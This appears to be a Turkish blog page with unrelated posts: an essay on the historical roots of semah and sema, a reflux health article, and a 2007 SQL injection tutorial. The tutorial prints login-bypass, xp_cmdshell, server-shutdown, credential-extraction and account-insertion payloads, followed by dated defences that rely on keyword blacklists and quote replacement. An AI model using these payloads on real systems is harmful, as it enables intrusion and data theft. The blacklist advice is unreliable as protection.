Alevilik ve Bektaşilik’teki semah ile Mevlevilerde gördüğümüz sema ayinleri Antikçağ’dan çıkıp gelen dinsel tören ve şölenlerin bir devamıdır. En eski dans figürlerine Çatalhöyük’te rastlandı. 1956 yılında James Mellaart’ın keşfettiği bu site Neolitik çağa ait bilgileri bizlere ulaştırdı.Çatalhöyük İ.Ö. 6500 ile 5000Yıllarına tarihleniyor. İşte bu yerleşim merkezinde ele geçen frekslerin birisinde kimi figürlerin dans eden biçimde olması dikkati çekti. Meallaart bu dansların av öncesi –avın bereketli sonuçlanması için-yapılan dinsel törenlerde yapıldığını söyler.
V.D. Hably de Antikçağ’la ilgili yaptığı araştırmalarda toplumsal ve büyüsel ritüeller içinde yer alan saz-söz ve oyundan oluşan bu gösterilerin sergilenmesindeki amaçları şöyle özetler: “Doğumla ilgili olanlar,genç erkek ve kızları eriştirme törenleri,evlenme,gizli inanç törenleri,savaş ve kahramanlık yüreklendirmeleri,dinsel erekler içinde Tanrı’ya,Güneş’e,Ay’a,ateşe,atalara iyi ve bol avlanmaya,şeytani,kötü ruhları ve cinleri kovmaya, cenazeleri defnetmeye yönelik gösteriler yumağı...”
Kalkolitik çağa indiğimiz zaman bu dinsel ve yaşamsal faktörlerle ilgili törenlere ait bilgileri Gudea döneminde yapılan Zagmuk törenlerinde buluyoruz. Zagmuk da Newroz gibi “Yeni Gün” anlamına geliyor ve gece ile gündüzün eşit olduğu 21 Mart’ta kutlanıyordu. Baharın başlangıcı,bolluk ile yeni yıla başlama törenleriydi yapılanlar... Danimarkalı Antikçağ tarihçisi Arthur Chirstensen’in kitabelerden ve yazılı kil tabletlerden çıkardığı sonuçlara göre bu bayramın tarihi günümüzden 4334 yıl kadar öncesine gitmekte. Bu bayramda ülkenin kralı, marduk heykelinin elini tutar. Böylece hem baş tanrıya hem de ona bağlı tanrılara saygısını bağlılığını kanıtlamış olurdu. Bu törende baş Tanrı Marduk tüm diğer tanrılara kral ve tabasına yardım etmeleri için gerekli emri verirdi. Tapınakta ve çevrede ateşler yakılır müzik eşliğinde oyunlar oynanır,şiirler okunurdu. Yine Antikçağ tarihçilerinden C.Brockelman’da baş tanrının karşısında diğer tanrıların baş eğip selam durmalarının, el bağlamalarının Yezidi Kürtler’de Melek-Tavus’a saygı olarak aynen korunduğunu açıklar. Arthur Christensen de aynı düşüncededir. İcra edilen müzikli oyunun Yezidlerde Sersal olarak adlandırılan yeni yılda uygulanış ve sergileniş biçiminin günümüzden 4334 yıl önceki törenlere tıpa tıp uyduğunu açıklarlar. Fransızca olan metinde benzerliğin ötesinde tıpa tıp aynısı olduğu şöyle ifade edilmiştir:”Chez Les Yezidis ce n’est pas seulement la sig nification mytholojique de la fete de I’anqui,est la même que celle du ZAGMUK Babylonien” anlamı şu: Yezidlerdeki yeni yıl bayramı Zagmuk bayramının mitolojik bir uzantısı olmayıp tıpa tıp aynısıdır.
Bu yazarlar Yezidlikte olduğu gibi Zerdüşt inancında da diğer tanrıların Ahura Mazda başkanlığında Newroz günü toplandıklarını açıklamaktadırlar. Vendidat’ın 2 numaralı bölümünü bu savları için kaynakça gösterirler. Yima’da bu törende hazırdır ve geleneğe göre gece ve gündüzün eşit olduğu bir bahar günü Newroz’u “gerçekleştirir” sunar.
Ancak aynı yazarlar Avesta’da bu törenin yeni yıl bayramı olarak bu isim altında sözünün edilmiş olmasını “yaratıldığı günden beri yılın ilk gününü belirlemenin büyük krallara ait olmasından kaynaklandığını öne sürerek açıklamaya çalışırlar.
Semah’ın tarihi kökenini araştırırken Hititler dönemine de eğilmek istiyorum. Boğazköy’de ele geçen bol miktardaki kil tabletlerin çözümü konumuza ışık tutacak ve aydınlatacak niteliktedir.
Biz semahı incelerken mabetlerde yapılan dinsel şölenlerin sunuluş biçimini, içeriğini, uygulanan kuralları ele alacağız. Böylece günümüze Antikçağ’dan çıkıp gelen benzerlikler zaten kendiliğinden ortaya çıkacak. Şölen ve bu şölende yapılan dans,oyun,gösteriler bunları yönetenler,şölenlerin hangi nedenle ve kimler için yapıldığı,beklenenin ne olduğu öğrenildiğinde günümüzdeki semah ve sema’nın da kökenine inmiş olacağız.
Şimdi inceleyeceğimiz Hitit Panteonuna ait dinsel törenlerin tümünün Hurri uygarlığından bu halka intikal ettiği artık kesinleşti. R.North,Robert Statlender, Doçent Dr. Ali M. Dinçol yazdıkları eserlerde bu gerçeğe değinmemişlerdir. Bize göre de Gudea döneminden aşağıya inerken İ.Ö. 2 binli yıllarda Zağros yöresinde atalarından gelen uygarlığı kendi ardılları olan Mitanniler ve Urartular aracılığıyla binli yıllara taşıtan bu halk,mabet töreleri,dans,oyun ve mitoslar açısından çok zengin bir perspektif sunmuştur. Bu şölen gelenekleri Medlere kadar uzanır gider. Hititler döneminde mabette kutlanan Kapı Yapısı Bayramı,Yenı yıl bayramı, Hışuva bayramı önemli olanlardandır. Bunların yanı sıra orak bayramı,bağbozumu bayramı,harman bayramı gibi tarımla ilgili olanlarda sayılabilir. Bayramların bir çoğu Kral yada yakını olanlardan birisinin başkanlığında kutlanır. Tapınak yönetmenliklerinde temizlikle ilgili konulara çok önem verilmiştir. Kadınlarla cinsel ilişkide bulunmak tinsel açıdan kirlenmeye yol açar. Görevliler buna çok dikkat etmek zorundadır. Kişi yada kişiler güneş doğar doğmaz yıkanmalı ve sabahleyin tanrıların kahvaltılarında hazır olmalıdırlar. Kim bir kadınla yatarsa ve amirleri onu sorguya çektiklerinde doğruyu söylemek zorundadır. O na söyleyemezse bir arkadaşına söyleyecek ve kesin olarak yıkanacaktır. Fakat kasıtlı olarak yıkanmaz ve kirli bir durumda Tanrı ya ve O na sunulan kurban ekmeklerine,içki kaplarına yaklaşırsa bunu gören arkadaşı da durumu gizleyip de olay sonradan öğrenilirse her ikiside idam edilir.
Hurrilerden Hittitlere geçen bu kural Gudea zamanındaki Zagmuk törenlerini tıpatıp uyguladığını açıkladığımız Yezidi Kürtlerde de bu temizlik koşulu ile karşılaşırız.
“Sersal ( Yeni Yılı ) kutlamak için Şeyh Addi nin türbesinde toplanan yezidi cemaati adak etini (Kabduş) yemeden önce türbenin altından geçen Zemzem suyunda yıkanırlar.”
Tarihci A.H.Layard da Kürdistan da yaptığı bir inceleme gezisinde temizlik konusunda şu izlenimini dile getirir:
“Yezidi kasabasının varoşlarında kadınları ana dere içinde yıkanırlarken gördüm. Ertesi gün yapılacak törene hazırlanıyorlardı. Çünkü hiç kimse Şeyh Addi Türbesine bedenini ve elbiselerini temizlemeden giremez. Beni görmedikleri için tamamen soyunmuş olmalarına rağmen çekincesiz gezinmekteydiler. Erkekler ise gündüz derenin bir başka yerinde yıkanmışlardı”
Zerdüştlerde de düzenlen tören ve dinsel şölenlerde görevliler ve törene katılanlar temizlenmek zorundadırlar. Zerdüştler ayrıca nefesin ateşi kirlettiklerine inandıklarından ağızlarına bez bağlarlar.
Hititler döneminde yapılacak törende kral ve kraliçe özel tören giysilerini giyerler. Özel bölümde yer alırlar.
Bugün ki deyimi ile mutrıp kurulu yani müzik aletlerini çalanlar kral ve kraliçenin önünde ve ardında fasıla başlarlar. Dansçılar ellerini yukarı kaldırır sonra oldukları yerde çark atarlar (dönerler). İlahiler okunur.
Törenin önemli bölümlerinden biriside dini yemek faslıdır. Yemek işinde dini kurallar titizlikle uygulanır. Sofrada dem alınır. Dinsel yemek görevlileri ise sofracı,süpürücü,içki sunucu ve haberciden oluşur. İlahi okuyanlar,şarkı söyleyenler,çalgıcılar ve dansçıların özel giysileri içinde geçit töreni yaparlar.
Alevilik ve Bektaşilikte semah yapanların özel giysi giymeleri zorunluluğu yoktur.
Cem ve Sema törenlerinde de tanrının yakını olan kralın yerini dede ve postnişin almıştır. Dinsel tören yemeği bu felsefelerde de vardı. Semah ve Sema dan sonra yenen yemeğe Mevlevilikte Sumak. Alevilikte Sımat adı verilir. Yezidiler ise “kabduş” demektedirler. Aynı gelenek Zerdüştilerde de karşımıza çıkar.
Aşure geleneği de dinsel yemek törenlerinin bir uzantısıdır.
Biz yazımızda Semahın da içinde yer aldığı bir ritüeli temellerine inerek –Semahın da bir parçasını oluşturduğu – bu şölenin eskiliğine işaret etmiş olduk.
Şimdide semahın içeriği, amacı, biçimi üzerinde durmak istiyoruz.
Büyük zaman ve dıştan gelen etkiler sonucu değişmelerede uğramıştır.
Nitekim islamiyetin anadoluda yayılması ve bu dinin aldığı sert önlemler yüzünden semah – islamiyette çalgı,çengi, dem ve dans yasak olmasına karşın – islami bir şalı üzerine çekmek zorunda kalmış ve böylece varlığını koruyabilmiştir. Zerdüştlüğün,Yezidiliğin ve Sabiiliğin yarattığı tasavvuf (BİR OLMA yani birsellik) düşüncesi halk müslümanlığı ile bütünleştirilerek devlet müslümanlığına karşı çıkılmış;bu yüzden de pek çok alevi canlarının kanları akıtılmışsa da sonuçta bu günlere gelinebilmiştir. Eğer alevilik direnci olmasaydı biz ülkede,yöneticilerin kendilerini tanrının gölgesi sayma ve bu yolda bağnaz gerici uygulamaları ile özgür düşünceyi tümü ile ortadan kaldırmış olacaklarını düşünmekteyiz.
Semah sanıldığı gibi oyun olmadığını önceki yazılarımızda anlatmıştık. Hünkar Hacı Bektaşa göre;
SEMAH ARİFLERİN ALETİ MUHİPLERİN İBADETİ TALİPLERİN MAKSUDUDUR İLAHİ BİR SIRDIR O KİMSE Kİ SEMAHI BİR OYUN SANIR O CİFE DİR.
Mevlana da bir rubaisinde sema için şunları söyler;
YÜCESİN NUR GİBİSİN BİLKİ BÜTÜN SIR SENDE BİR EKİN AŞKIN İLE GİT GİDE YÜZ OLMADAYIM SEN SEN OLDUKÇA SEMA ETMEKTEYİM ÇEVRENDE BEN SEN OLDUKÇADA ÇEVREMDE DÖNÜP DURMADAYIM
Bu iki bilginin de ortak görüşü semahın Tanrı ile bütünleşme,O nun zerresi haline gelme yani vahdaniyetin özü olduğu noktasında odaklaşıyor. Semah,bir coşku ve cezbe aracıdır. Müzik ve raks aracılığı ile kişi manevi bir alemde geziye çıkmaktadır.
Ünlü İpek Yolu filmini çeken rejisör Omara nın da bir japon olarak sema törenini Konya da izledikten sonra bize anlattıkları bundan hiç farklı değildi.
Semah ve Sema yalnız bu özelliği ile değil, şiirin,müziğin ve raksın,yaşaması gelişmesi ve boyutlanmasında da büyük yarar sağlamıştır.
SQL Enjeksiyon Saldırıları & Korunma Yolları @ 14-04-2007 05:07 Dünyanın her tarafında, kullanıcılarına; kredi kartı numaraları, kullanıcı bilgileri gibi gizli kalması gereken bilgilerin, ürünlere ve siparişlere ait verilerin saklandığı uç-arka veri depolarıyla hizmet veren web siteleri bulunmaktadır. Ve genel olarak, web sitelerindeki form aracılığı ile alınan girdi ile veritabanındaki bilgiler filtrelendikten sonra sonucu kullanıcıya gönderen bu tür sistemlerde Yapısal Sorgulama Dili (Structured Query Language - SQL) kullanılmaktadır. Uygulama içerisinde kullanılacak parametre değerleri alınırken kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle güvenlik problemleri ortaya çıkmaktadır.
Bu güvenlik problemleri kullanılarak bir uygulamanın arkasında, bu uygulamaya destek veren veri tabanı üzerindeki bütün bilgilere ulaşılabilir veya bilgiler üzerinde değişiklik yapılabilir. Veya veri tabanı sisteminin komutları kullanılarak kullanılan sunucular üzerinde uygulama harici istenen işlemler de yapılabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karşı kontrol eden fonksiyonların kullanılmalı ve geniş çaplı uygulamaların bu güvenlik açıklarını taşıyıp taşımadığını anlamak için güvenlik denetimine tabi tutulmalıdır..
İlgilendiren Sektör ve Şirketler:
* Özel olarak geliştirilmiş uygulamalar kullanan tüm kurum ve kuruluşlar * Internet / Intranet üzerinde uygulama geliştiren kuruluşlar
1. Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"
Yapısal Sorgulama Dili SQL'in uygulamalarda kullanımına örnek vermek gerekirse;
SELECT Name, Address FROM Users WHERE UserID = '1111'
Şeklindeki SQL Deyimi "Users" adlı tablodan "1111" ürün ID si ile veritabanına kayıtlı olan kişiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayıflık, kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle ortaya çıkmaktadır. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini sağlayan fonksiyonlardır.
Hızla gelişen internet teknolojileri karşısında yeni pazarda geç olmadan yerini almak isteyen müşterilerine daha kısa sürede daha kullanışlı ve ucuz çözümler sunmak zorunda olan uygulama geliştiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadırlar.
Giderek yaygınlaşan ve medyanın haber potansiyelini oluşturan; çalınan kredi kartı numaraları, yer altı sitelerde dağıtılan müşteri bilgileri, şirket projeleri - yazışmaları yaklaşan tehlikenin habercisi olmakla beraber halen bu tür kayıpların yaratabileceği maddi sonuçları kavrayamayan ve hala "az maliyetle kurtarılan güvenlik projeleri" 'yle övünen yöneticilere uyarı niteliği taşımaktadır. Öyleki -herzaman bir adım önde olmayı amaçlayan- saldırganlar güvenliğin en üst seviyede olması beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldırılarına da ara vermeksizin devam etmektedirler.
Maddi ve manevi değere sahip şirketinizi bir anlamda iş ortaklarını olan uygulama geliştiricilerin hazırladıkları uygulama ürünlerine emanet edildiğini düşünürsek, "uygulamalarınıza ne kadar güvenirsiniz?" gibi bir soruya verilecek cevap büyük önem taşımaktadır.
Böyle bir ortamda uygun güvenlik çözümü için ayrılmış bütçe bir lüks değil her an yapılabilecek bir saldırıda şirketin uğrayacağı zararı ortadan kaldırmak için alınması gereken önlem niteliği taşımaktadır.
2. Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."
Güvenlikte sıkça kullanılan bir deyim; "Saldırganlardan korunabilmek için onlar gibi düşünmelisiniz!..". Saldırganın sisteminize girmek için kullanabileceği yöntemleri bilmek bu saldırılardan korunabilmek için alınan önlemleri daha sağlıklı kılacaktır.
Örneklerde kullanacağımız hedef ; Microsoft® Internet Information Server™' dan Microsoft® SQL Server™'a varsayılan sistem hesabı'ndan (sa) bağlanan ASP tabanlı bir kullanıcı hesabı yöneticisi olacak. Form.asp : Username ve Password girdisini alan form.Solda... Login.asp : Veritabanı ile bağlantıya geçen ve girdinin doğruluğunu kontrol eden ASP kodu.
2.1. Kötü Amaçlı (') İmleçleri Yardımıyla İzinsiz Giriş Sağlama:
Kullanıcı "Username" & "Password" verisini Login.asp ye yolladıktan sonra .asp kodunun yapacağı iş verilen yoldaki veritabanı ile bağlantı kurup ilgili tabloda Username ve Password sütünlarında gönderilen verinin doğruluğunu kontrol etmek olacaktır. Bu işlem sonucunda eğer sonuç olumluysa kullanıcıya; "Giriş Yapıldı" olumsuzsa; "Geçersiz Kullanıcıadı & Şifre" mesajı verilecektir.
Örnekleyecek olursak;
Username : xxxx Password : 1111
Şeklindeki kullanıcı girdisi aşağıdaki SQL Deyimini oluşturacaktır;
SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = '1111'
İlk bakışta sorun olmayan bir SQL Deyimi... Fakat saldırganın;
SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = '' OR 1=1 --'
Olacaktır ki, bu durumda girişin sağlanması için şart "xxxx" kullanıcı adına ait şifrenin hiçbirşey* olması veya ikinci bir opsiyon olarak 1=1 eşitliğinin sağlanmasıdır.
* Hiçbişey = Boşluk
Sonuç : 1=1 eşitliği sağlandığına göre saldırı başarıyla sonuçlanacak ve "Giriş Yapıldı" mesajı verilecektir.
Not : Microsoft® SQL Server™ "--" imlecinden sonra gelen yersiz kullanılmış tırnak işaretlerini göz ardı edecektir. İlk bakışta basit gibi görünen ve sadece SQL Server'a ait olan bu özellik ilerde örneklerden de anlaşılacağı üzere saldırgana büyük kolaylık sağlayacaktır..
2.2. Uzaktan Çalıştırılması Mümkün Olan Prosedürler:
MS SQL Server'a varsayılan sistem hesabından yaptığımız bağlantı SQL Enjeksiyon saldırısında muhtemel saldırgana sunucuda saklanan prosedürleri çalıştırabilmesi için gerekli hakları tanıyacaktır. Saldırganın kullanabileceği prosedürlerden bir tanesi; "master..xp_cmdshell" olabilir.
SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = ''; EXEC master..xp_cmdshell 'dir c:'--'
Sonuç : SQL Server Kullanıcıadı ve Şifreyi bulunduran sütunları arayacaktır bulamadığı için "Yanlış Kullanıcıadı & Şifre" mesajını verecektir fakat bu arada arka planda "dir c:" komutunu çalıştıracak ve saldırgan C sürücüsünün içeriğine ulaşacaktır.
2.3. SQL Server Hedef Alınarak Yapılan Saldırılar:
Yönetici haklarına sahip saldırgan silme,ekleme,değiştirme...vb gibi komutları rahatlıkla çalıştırabilecektir.
SHUTDOWN WITH NOWAIT SQL Server'ın kritik komutlarından bir tanesidir. Komutla beraber SQL Server görevine son verir.
Username : '; SHUTDOWN WITH NOWAIT-- Password : [Boş]
Bu girdilerle oluşturulan SQL Deyimi;
SELECT Username FROM Users WHERE Username=''; SHUTDOWN WITH NOWAIT; --' AND Password=''
Sonuç : SQL Server kullanıcıadının bulunamadığı mesajını verecektir. Fakat bununla beraber arka planda diğer komutu çalıştırdığı için SQL Server kapanacaktır.
2.4. ODBC Hatalarından Faydalanarak Yapılan Saldırılar:
SQL Server'ın verdiği hatalardan faydalanarak veritabanındaki neredeyse tüm bilgilere ulaşmak mümkündür.
Hedef; http://Victim/Default.asp?id=10 şeklinde ürün ID leri ile çalışan ASP tabanlı bir websitesi.
Saldırı SQL Server'ın integer ve string cinsinden verileri birlikte gönderememesinden faydalınarak yapılabilir;
Gönderilen '10' sayısına veritabanından herhangi bir string eklenir.
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Not: "INFORMATION_SCHEMA.TABLES" sistem tablosu, sistemde bulunan diğer tüm tablolar hakkında bilgi içerir. Deyimde kullanılan "TABLE_NAME" de yine tüm tablo isimlerini içerir.
Oluşacak SQL Deyimi;
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
String -> Integer dönüşümünü yapamayan SQL Server aşağıdaki hatayı verecektir.
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Table1' to a column of data type int. /Default.asp, line 5
Hata, saldırgana "Table1" olarak bulduğu cevabı integer a çeviremediğini (dolayısıyla veritabanındaki ilk tablo adının "Table1" olduğunu) belirtmektedir. Saldırgan diğer tabloların adını aşağıdaki şekilde öğrenebilir...
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('Table1')--
Veya doğrudan LIKE komutunu kullanarak aradığı şeye daha kolay yoldan ulaşabilir;
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25Login%25'--
SQL Server'ın vereceği hata;
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin_Login' to a column of data type int. /Default.asp, line 5
Admin_Login adında bir tablo olduğunu öğrenen saldırgan muhtemelen tablodaki ilk kullanıcıadı ve şifreye ulaşmak isteyecektir. İzleyebileceği yol ise;
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Username FROM Admin_Login--
Hata;
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xxxx' to a column of data type int. /Default.asp, line 5
Bu şekilde "admin" kullanıcıadının varlığını doğrulayan saldırganın şifreyi ele geçirmek için kullanacağı girdi;
http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Password FROM Admin_Login WHERE Username='xxxx'--
Hata;
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1111' to a column of data type int. /Default.asp, line 5
Sonuç : Username : xxxx Password : 1111
2.5. Veritabanına Ekleme Yapma veya Veri Düzenleme: Kullanıcıadı ve şifre bilgisine ulaşan muhtemel saldırgan benzer yöntemleri ve UPDATE,INSERT komutlarını kullanarak şifreyi değiştirebilir veya daha temizi başka bir kullanıcı hesabı açabilir...
http://Victim/Default.asp?id=10; UPDATE 'Admin_Login' SET 'Password' = 'NewPwd' WHERE Username='xxxx'--
Yeni bir kullanıcı hesabı için;
http://Victim/Default.asp?id=10; INSERT INTO 'Admin_Login' ('UserID', 'Username', 'Password', 'Details') VALUES (666,'aaaaa','1111','N/A')--
3. Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdür..."
Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!".
3.1. Kullanıcı Haklarının Sınırlandırılması
Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır.
Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır.
3.2. Girdilerde Tırnak İmleçlerinin (') Kötü Amaçlı Kullanımının Engellenmesi
Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (') tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır.
Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir.
ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir;
<% Function ReplaceQuotes(strWords) ReplaceQuotes = Replace(strWords,”’”,”””;) End Function %>
Bu fonksiyonu baştaki örnekte kullanırsak;
SELECT count(*) FROM Users WHERE Username='xxxx' AND Password='' OR 1=1 --'
şeklinde olan deyim...
SELECT count(*) FROM Users WHERE Username='xxxx' AND Password='" OR 1=1 --'
'e dönüşecektir.
3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi
SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir.
Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir;
<% Function FilterBadWords(strWords) dim BadWords dim NewWords BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_";) NewWords = strWords for i = 0 to uBound(BadWords) NewWords = Replace(NewWords, BadWords(i), "";) Next FilterBadWords = NewWords End Function %>
Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;
SELECT Username FROM Users WHERE Usename=''; EXEC master..xp_cmdshell 'dir c'; --' AND Password=''
Şeklindeki SQL Deyimi...
SELECT Username FROM Users WHERE Usename='" EXEC master.. cmdshell "dir c:" ' AND Password=''
e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir.
Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir.
3.4. Girdi Uzunluğunun Sınırlandırılması
Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir.
3.5. Girdi Cinsinin Kontrol Edilmesi
Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.
3.6. Girdi Cinsinin Kontrol Edilmesi
Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.
4. Son Söz - "Herzaman bir adım önde!"
Aldığınız güvenlik önlemleri veya (en iyi ihtimalle) yazıp da kullanmayı bir alışkanlık haline getiremediğiniz güvenlik politikaları sizi güvenlik problemlerine karşı koruyabilir mi? Eğer güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almıyorsanız hiçbir güvenlik ürünü, bir güvenlik kaybına uğramanızı engelleyemez.
Bilgi sistemleri altyapınızı taşıdıkları güvenlik zaaflarına karşı düzenli olarak kontrol ettirmek, risklerinizi takip etmek, doğru teknolojiyi doğru yerde ve doğru şekilde kullanmanızı sağlayacak güvenlik politikalarınızı oluşturup güvenlik probleminizi sürekli yönetebilecek olgunluğa ulaşmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kısmını oluşturan uygulamaların taşıyabileceği güvenlik sorunları uzun süredir ihmal edilmelerinden dolayı, günümüzün en popüler sistem sızma noktalarını teşkil etmektedirler. Bu nedenle uygulama güvenliğine ilişkin gereken önemi vermeniz, güvenlik denetimi yaptırmanız ve kurumunuzun bilgi güvenliği yönetim sistemini oluşturmaya bir yerinden başlamanızı öneriyoruz.
Yazan: Yazarın isteği üzerine ismi kaldırıldı.(Anonim)
Davs - örnek @ 11-04-2007 08:47 %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Reflü hakkında @ 11-04-2007 05:22 Kısaca Reflü olarak anılan Gastro Özofageal Reflü (GÖR), mide içeriğinin yemek borusuna geri kaçmasıdır. Reflü hastalığı ise çeşitli sebeplerden dolayı mide içeriğinin yemek borusuna doğru geri kaçması sonucunda ortaya çıkan bir dizi şikâyetlerdir. Bu kaçak belli bir sürenin ve miktarın üstünde olunca ciddi problemlere yol açar ve bu önemli bir sağlık sorunudur. Reflü toplumumuzda erişkinlerin yaklaşık yüzde 20'sinde görülmektedir.
Yemek borusunun alt ucunda mide içeriğinin yemek borusuna geçişini engelleyen bir kapak mekanizması vardır. Reflü hastalarında en sık görülen özellik bu mekanizmanın gevşekliğidir. Bu durum sıklıkla mide fıtığıyla birlikte yaşanır. Mide boşalım bozukluğu ya da bozulmuş yemek borusu hareketi bu hastalığı tetikleyen nedenlerdir.
Reflü Hastalığının genel şikayetleri şöyledir:
* Mide yanması (en sık), * Göğüste yanma ve ekşime, * Ağza gelen acı tat, * Ağız kokusu, * Tok karna yatıldığında şişkinlik, geğirme ve boğulma hissi, * Göğüste takılma ve sıkışma hissi, * Göğüs kafesine bası ve çarpıntı, * Nefes almada güçlük,
Özellikle belirtmek istediğim nokta, çok sayıda hastaya farenjit, sinüzit ya da astım tanısı konulur. Hastaya tedaviler uygulanır ama hastanın şikâyetleri geçmez. Özellikle tedaviye cevap vermeyen bu tür hastalarda Reflü hastalığı değerlendirilmelidir.
Reflü Hastalığının tanısı hastanın muayenesi ve sorgulanması (ki biz buna anamnez diyoruz) sonrası Endoskopik Muayene (Gastroskopi), Baryumlu Pasaj Grafisi, Manometri ve pH Metri denilen yöntemlerle konulur.
Reflü hastalığının tedavisi doktorunuz tarafından belirlenecek olan aşağıdaki yöntemlerle gerçekleştirilir:
* Yaşam tarzı değişiklikleri, * İlaç tedavisi (proton pompa baskılayıcı ilaç tedavisi, aljenik asit içeren ilaç tedavisi, prokinetik ilaç tedavisi) * Cerrahi tedavi (reflünün nedeni mide fıtığı ise uygulanır)
Reflüsü Olanlar Yemesin
Yağlı yiyecekler ve kızartmalar, Turunçgiller ve suları, Gazlı ve asitli içecekler, Çay, kahve, Alkol, sigara. Salam, sucuk, sosis, Baharatlar, Gaz yapan besinler, Çiğ soğan ve sarımsak, Ağrı kesici, kas gevşetici ilaçlar, Kuruyemişler Çikolata. Sirke, limon.
Reflüsü Olanlara Öneriler
Geceleri yatmadan iki üç saat önce günün son yemeğini yiyin. Yatarken sol tarafınıza doğru açılı yatın. Yüksek yastıkta yatın. Yolculuğa çıkarken tıka basa yemeyin ve uzun araba yolculuklarında sık sık ara verin. Uçakta ise belli aralarla ayağa kalkın ve hareket edin. Özellikle tok karnına öne eğilme hareketlerinden kaçının. Masa başında ya da televizyon karşısında her zaman arkaya doğru geniş açılı oturun. Hiçbir zaman tıka basa yemek yemeyin. Öğünleriniz sık ve hafif olsun. Karnınızı sıkan kemerler takmayın, dar elbiseler giymeyin. Fazla kilolarınızdan (varsa) kurtulun.
